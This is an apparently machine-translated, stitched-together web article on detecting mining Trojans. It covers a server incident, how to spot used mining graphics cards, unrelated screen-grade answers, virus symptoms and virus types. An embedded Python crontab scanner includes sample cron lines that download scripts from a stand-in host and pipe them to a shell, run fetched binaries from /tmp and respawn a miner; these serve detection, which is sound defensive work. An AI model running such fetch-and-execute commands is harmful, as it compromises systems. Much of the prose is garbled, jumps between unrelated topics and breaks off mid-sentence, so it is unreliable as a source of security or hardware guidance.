How to judge whether the computer has been invaded and mined
and find the whole system of the Yudian terminal in the product, then choose to apply for the use of Tencent Yudian, and then use its virus-killing function to kill the virus.
As a graphics card carries not only the GPU but also video memory, a power supply unit and a large number of chip resistors and capacitors, long-term mining will age some components, so the life of this kind of graphics card is worrying. But as long as the CPU heat dissipation has been good, basically do not worry; the vast majority can continue to serve for a long time.
A new customer recently consulted with Sine Security, saying that his server often lags, the website fails to open, and the remote connection to the server is extremely slow. Sometimes the ping value reaches 300-500, and he often switches. After hearing the customer's description, one would generally judge that he had been attacked by mixed CC + DDoS traffic. Strangely, the computer room reported no traffic attack. It is not a traffic attack, yet it still makes the server lag and the website fail to open. What kind of attack is this? To solve the client's server lag, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan is also designed so that if the customer forcibly stops the mining process, it automatically starts again and continues mining, to achieve uninterrupted mining.
Careful inspection shows that it does this by setting an hourly scheduled task that remotely downloads a shell mining Trojan and then executes it. The task checks whether the process currently exists and, if not, starts the Trojan to mine.
A detailed security inspection was carried out on the client's Linux server. It was found that, fortunately, there was no encrypted server data, and the worm was infected with the disease virus. If the data had been encrypted, the loss would have been great. The client was a platform, and the client's data was very important. After finding the mining Trojan, does the customer need to know how the server was attacked? Was the Trojan uploaded? Knowing this can prevent the attack at a later stage.
Through the security detection and analysis of our security engineers, we found that the server uses an Apache Tomcat environment, the architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache. Through this vulnerability, the intruder can directly invade the server and get administrator permission on the server. The Sine Security engineer immediately repaired the Apache vulnerability and cleared the Trojan. So far, the problem has been solved, the client's server runs stably, and the website opens normally.
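The persistence described above (a frequently run scheduled task that downloads and executes a script, plus a check that restarts the miner when its process is missing) can be hunted for in crontab contents. The following is an added example, not part of the original write-up: the rule names, the sample crontab and the `example.invalid` host are constructed for illustration.

```python
import re

# Constructed sample in `crontab -l` format (not taken from the incident).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * curl -fsSL http://example.invalid/u.sh | sh
@hourly wget -q -O /tmp/.k http://example.invalid/k && chmod +x /tmp/.k && /tmp/.k
*/5 * * * * pgrep -x sampled >/dev/null || /var/tmp/sampled -B
30 2 * * * /usr/local/bin/backup.sh
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

FETCH = r"\b(?:curl|wget)\b[^|;&]*https?://\S+"
RULES = {  # hypothetical rule names; each regex covers one persistence trait
    "fetch-pipe-shell": re.compile(FETCH + r"[^|;&]*\|\s*(?:ba|da)?sh\b"),
    "fetch-then-exec": re.compile(
        FETCH + r".*(?:chmod\s+\+x|&&\s*(?:/tmp|/var/tmp|/dev/shm)/)"),
    "respawn-watchdog": re.compile(
        r"\b(?:pgrep|pidof)\b[^|]*\|\|\s*\S+|\bps\b.*\|\s*grep\b.*\|\|\s*\S+"),
}

def parse_entry(line):
    """Return (schedule, command) for a user-crontab job line, else None."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None  # blank line, comment, or VAR=value assignment
    if line.startswith("@"):
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def runs_at_least_hourly(schedule):
    """True for @hourly or a wildcard hour field (fires every hour or more often)."""
    return schedule == "@hourly" or (
        not schedule.startswith("@") and schedule.split()[1] == "*")

def scan(crontab_text):
    """Return [(line_no, [matched rule names], runs_at_least_hourly)]."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        tags = [name for name, rx in RULES.items() if rx.search(entry[1])]
        if tags:
            findings.append((no, tags, runs_at_least_hourly(entry[0])))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_CRONTAB):
        print(finding)
```

On a live host the same scan would be fed each user's `crontab -l` output; the system-wide files under `/etc/cron.d` carry an extra user field that `parse_entry` does not handle.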
Mining burns out graphics cards. The following methods can identify whether your own graphics card is a mining card:
1: Besides identifying by eye whether the hardware is a mining card, it can also be measured in other ways. For example, test the card's overclocking performance on a computer and compare it with the official data, or test the stability of the card's power supply; this can also show whether it is a mining card or not.
2: The first point is to see whether there is any dirt or oil on the card. If not, either the seller has cleaned it well or it is not a mining card. If the card is very dirty, nine times out of ten it is a mining card. Then we have to carry out the next operation, which is to open the card.
3: Pay attention to whether there is an invoice with warranty. A card whose warranty can be honored at warranty points all over the country is not a mining card.
Extended information
How to avoid buying mining cards: try to buy new cards at the official flagship stores on Taobao or Jingdong; if you want to buy second-hand graphics cards cheaply, there is no guarantee.
If the budget is really limited and you have to buy second-hand graphics cards, you should also try your best to buy them by yourself. Don't believe stories that an Internet cafe, studio or company went bankrupt; most of the cards bought through this channel are mining cards. Of course, if an individual seller has a large number of graphics cards on hand, please be careful, as these are probably mining cards too. Finally, I hope you can avoid mining cards, buy your favorite graphics card, and enjoy your games.
1. The computer runs abnormally slowly
2. The computer crashes abnormally / gets stuck
3. Nothing is turned on, but the CPU occupancy rate is very high
4. The network is slow and a large number of network requests appear
Hello, 3A and AAA are the same.
A++ is the best screen; an AAA screen is equal to an A+ screen, which is also a screen with relatively good quality control and no bad points.
However, considering the quality, A++ is more cost-effective.
Computer failure is not only caused by virus infection, but also by software and hardware failure of the computer itself and by permission settings on the network. Only when we fully understand the differences and connections between the two can we make a correct judgment and discover a real virus in time. Next, I will briefly list some common computer failure symptoms caused by viruses and by software and hardware failure.
Symptom: possibility of virus invasion; possibility of software and hardware failure
Frequent crashes: the virus has opened many files or occupied a lot of memory; instability (such as poor memory quality, poor hardware overclocking performance, etc.); running large software that takes up a lot of memory and disk space; using test software (which has many bugs); insufficient hard disk space, etc.; when running software over the network, frequent crashes may be because the network speed is too slow, the running program is too large, or the hardware configuration of the workstation is too low.
The system cannot start: the virus has modified the boot information of the hard disk or deleted some boot files; if the boot-type virus boot file is damaged; the hard disk is damaged or its parameters are set incorrectly; system files were deleted by mistake.
The file cannot be opened: the file format has been modified by the virus; the virus modified the file link location. The file is damaged; the hard disk is damaged; the link location of the file shortcut has changed; the software originally used to edit the file has been deleted; on a LAN, the file's storage location on the server has changed and the workstation has not refreshed the contents of the new server in time (the resource manager has been open for a long time).
Frequent reports of insufficient memory: viruses illegally occupy a large amount of memory; a large number of programs are open; running software that needs a lot of memory; incorrect system configuration; not enough memory (at present, the basic memory requirement is 128M).
Prompt that the hard disk space is not enough: the virus has copied a large number of virus files (several cases have been encountered: sometimes a Win98 or WinNT 4.0 system installed on a perfectly good hard disk of nearly 10G says there is no space, and as soon as software is installed it prompts that the hard disk space is not enough); the capacity of each partition of the hard disk is too small; a large amount of large software is installed; all the software is installed in one partition; the hard disk itself is small; on a LAN, the system administrator has limited the space of the workstation user's "private disk"; you can view the size of the entire network disk, but the "private disk" has run out of capacity.
Read/write signal when the floppy disk and other devices are not being accessed: virus infection; the floppy disk has been removed while a file that was opened from it is still open.
A large number of unknown files appear: the virus is replicating files; they may be temporary files generated during some software installation; they may also be the configuration information and running records of some software.
Black screen at startup: virus infection (I remember April 26, 1998: I paid thousands of yuan for CIH; the first time I turned the machine on that day it crashed at the Windows screen, and the second time I turned it on there was nothing left); display failure; display card failure; motherboard failure; excessive overclocking; CPU damage, etc.
Data loss: the file was deleted by the virus; a hard disk sector is damaged; the original file was overwritten due to file recovery; if it is a file on the network, it may have been deleted by other users by mistake.
Keyboard or mouse locks up for no reason: a virus is making trouble, pay special attention to "Trojan Horse"; the keyboard or mouse is damaged; the keyboard or mouse interface on the motherboard is damaged; a keyboard or mouse lock program is running; the program is too large and the system is very busy for a long time, so pressing the keyboard or mouse does not work.
The system runs slowly: the virus takes up memory and CPU resources and runs a large number of illegal operations in the background; low hardware configuration; too many or too large open programs; incorrect system configuration; if you are running programs over the network, it is mostly due to the low configuration of your machine. It is also possible that the network is busy and many users have opened a program at the same time; another possibility is that you don't have enough hard disk space for temporary data exchange when running programs.
The system performs operations automatically: the virus performs illegal operations in the background; the user has set a program to run automatically in the registry or startup group; some software needs to restart the system automatically after installation or upgrade.
Through the above analysis and comparison, we know that in fact most faults may be caused by human error or by software or hardware faults. When we find an exception, we should not rush to a conclusion. When antivirus software cannot solve the problem, we should carefully analyze the characteristics of the fault and eliminate the possibility of software, hardware and human causes.
Virus classification and their respective characteristics
In order to truly identify a virus and check and kill it in time, we still need a more detailed understanding of viruses, and the more detailed the better.
Viruses are written by many scattered individuals or organizations, and there is no standard to measure and divide them. Therefore, viruses can be roughly classified from multiple perspectives.
According to the infected objects, viruses can be divided into the following categories:
A, boot viruses
This kind of virus attacks the boot sector of the disk so that it gets priority execution when the system starts, and thereby controls the whole system, so the loss is relatively large. Generally speaking, the system will not start normally, but this kind of virus is easier to check and kill. Most antivirus software can check and kill this kind of virus, such as kv300, the kill series, etc.
B, file viruses
In the early stage, this kind of virus usually infected executable files with extensions such as exe and com, so that when you run an executable file the virus program is activated. Recently, some viruses have infected files with DLL, OVL and SYS extensions. Because these files are usually the configuration and link files of a program, the virus is automatically loaded when the program is executed. They load themselves by inserting the whole virus code into the blank bytes of these files. For example, the CIH virus splits itself into 9 segments and embeds them into an executable file of PE structure. After infection, the number of bytes of the file usually does not increase, which is its hidden side.
C, network viruses
This kind of virus is the product of the rapid development of networks in recent years. The infected object is no longer limited to a single mode and a single executable file, but is more comprehensive and more hidden. Some network viruses can now infect almost all office files, such as Word, Excel, e-mail and so on. The attack mode has also changed, from the original deletion and modification of files to file encryption and stealing users' useful information (such as hacker programs). The way of transmission has also undergone a qualitative leap: it is no longer limited to disks, but goes through more hidden network channels, such as e-mail, electronic advertising, etc.
D, complex viruses
We classify these as "complex viruses" because they have some characteristics of both "boot" and "file-type" viruses: they can infect both the boot sector of the disk and executable files. If this kind of virus is not completely removed, the residual virus can recover itself and will again infect the boot sector and executable files. Therefore, it is very difficult to check and kill this kind of virus, and the antivirus software used should be able to check and kill both kinds of virus at the same time.
The above is divided according to the object of virus infection. If we divide according to the degree of damage, viruses fall into the following categories:
A, benign viruses
These are called benign viruses because the purpose of their invasion is not to destroy your system, but just to play. Most of them come from beginner virus enthusiasts who want to test their level of developing virus programs. They don't want to destroy your system; they just make some sound or give some hints, and they do no harm except taking up a certain amount of hard disk space and CPU processing time. Some Trojan virus programs are also like this, and just want to steal some communication information from your computer, such as passwords and IP addresses, in case of need.
B, malignant viruses
We classify as "malignant viruses" those that only interfere with the software system, steal information or modify system information, and do not cause serious consequences such as hardware damage or data loss. After this kind of virus invades the system, there is no other loss except that the system cannot be used normally. After the system is damaged, it usually needs some system files to be reloaded to recover. Of course, you still need to kill these viruses before reloading the system.
C, extremely virulent viruses
This kind of virus is more damaging than the above-mentioned type B virus. Generally, if you are infected with this kind of virus, your system will crash completely and will not be able to start normally at all. The useful data you keep on your hard disk may not be available, and in lighter cases it deletes system files and applications.
D, catastrophic viruses
We can tell the degree of damage from the name. This kind of virus usually destroys the boot sector of the disk, modifies the file allocation table and hard disk partition table, and leaves the system unable to start at all. Sometimes it even formats or locks your hard disk, making it impossible for you to use it. Once infected with this kind of virus, your system will be difficult to recover, and the data kept on the hard disk will be difficult to obtain. The loss caused is very large. So we should prepare for the worst at any time; enterprise users in particular should make full use of disaster backup. Fortunately, most large enterprises have realized the significance of backup and spend a lot of money on daily system and data backup. Although we all know that it may not be possible to encounter such disastrous consequences in a few years, we still relax; "In case". Nestle, where I live, is like this, and it also attaches great importance to this issue. For example, the outbreak of the CIH virus on April 26, 1998 can be classified as this kind, because it not only damages software, but also directly damages the hard disk, the motherboard BIOS and other hardware.
According to the way of invasion, viruses can be divided into the following types:
A. Source code embedding attack type
From its name, we know that the main target of this kind of virus invasion is high-level language source programs. The virus inserts its code before the source program is compiled, and is finally compiled into the executable file together with the source program, so the newly generated file is a poisoned file. Of course, there are very few such documents because of these diseases
Try to choose a well-known one; Comodo is recommended for the firewall, and Microsoft's patches are also available. These are suspicious online searches. Then I recommend a small tool, dangerous-port closure software, to prevent hackers from invading through these ports.